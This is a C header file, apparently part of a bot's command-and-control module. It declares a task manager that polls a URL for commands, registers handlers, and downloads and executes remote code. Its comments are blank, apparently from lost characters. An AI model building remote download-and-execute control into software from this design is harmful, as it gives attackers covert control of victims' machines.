//---------------------------------------------------------------------------

#include "windows.h"

#ifndef TaskH
#define TaskH
//---------------------------------------------------------------------------


//===============================================================
//   
//===============================================================
#define COMMAND_ALL 0xFFFFFFFF  //  

#define COMMAND_UPDATE_CONFIG  0x00000001 //   
#define COMMAND_DOWNLOAD       0x00000002 //    
#define COMMAND_MULTI_DOWNLOAD 0x00000004 //     




//---------------------------------------------------------------
// PTaskManager -   , 
//---------------------------------------------------------------
typedef LPVOID PTaskManager;


//---------------------------------------------------------------
// TCommandMethod -   
//---------------------------------------------------------------
typedef bool (*TCommandMethod)(PTaskManager,    //    
												//  
							   PCHAR,  			// 
							   PCHAR); 			// 


//*****************************************************************
//  InitializeTaskManager   
//
//  Manager -     .
//			    ,   
//			    
//
//  !!!      
//			    
//			    !!!!
//*****************************************************************
bool InitializeTaskManager(PTaskManager *Manager);


//*****************************************************************
//  FreeTaskManager   
//
//     Manager,    
//   
//*****************************************************************
void FreeTaskManager(PTaskManager Manager);


//*****************************************************************
//  GetGlobalTaskManager -    
//						    
//*****************************************************************
PTaskManager GetGlobalTaskManager();


//*****************************************************************
//	RegisterCommand -  
//
//  Manager -   .   ,  
//			      
//
//  CommandName -  
//
//  Method -   
//
//*****************************************************************
bool RegisterCommand(PTaskManager Manager, PCHAR CommandName, TCommandMethod Method);


//*****************************************************************
//	StartTaskManager -      
//
//  Manager -     .  
//			  ,     
//
//  URL -     
//
//  InitManager -    . 
//				       Manager
//
//  InitCommands -     
//
//   -      
//  			  
//
//*****************************************************************
bool StartTaskManager(PTaskManager Manager, PCHAR URL, bool InitManager, bool InitCommands);


//*****************************************************************
// StopTaskManager -     
//*****************************************************************
void StopTaskManager(LPVOID Manager);

//*****************************************************************
//  RegisterAllCommands -    
//*****************************************************************
void RegisterAllCommands(PTaskManager Manager, DWORD Commands);

//*****************************************************************
//  DownloadCommand -   
//
//  URL -   
//
//  HTMLCode -   HTML
//*****************************************************************
bool DownloadCommand(PCHAR URL, PCHAR Password, PCHAR *HTMLCode);

//*****************************************************************
//	DownloadAndExecuteCommand -    
//
//  Manager -   .   ,
//			       
//
//  URL -   
//
//   -      
//				
//
//*****************************************************************
bool DownloadAndExecuteCommand(PTaskManager Manager, PCHAR URL);

//*****************************************************************
//  TaskManagerSleep  -    .
//						    
//						 .
//
//  Manager -  .   ,   
//            
//
//   -    ,  
//				     
//				     
//				    
//
//*****************************************************************

bool TaskManagerSleep(PTaskManager Manager);

//   Command   Args
//    Deferred == true    
//   
bool ExecuteCommand(LPVOID Manager, PCHAR Command, PCHAR Args, bool Deferred = false);

// c HTML   
bool ExecuteCommand(LPVOID Manager, PCHAR HTML, bool Deferred = false);


//---------------------------------------------------------------------------
#endif
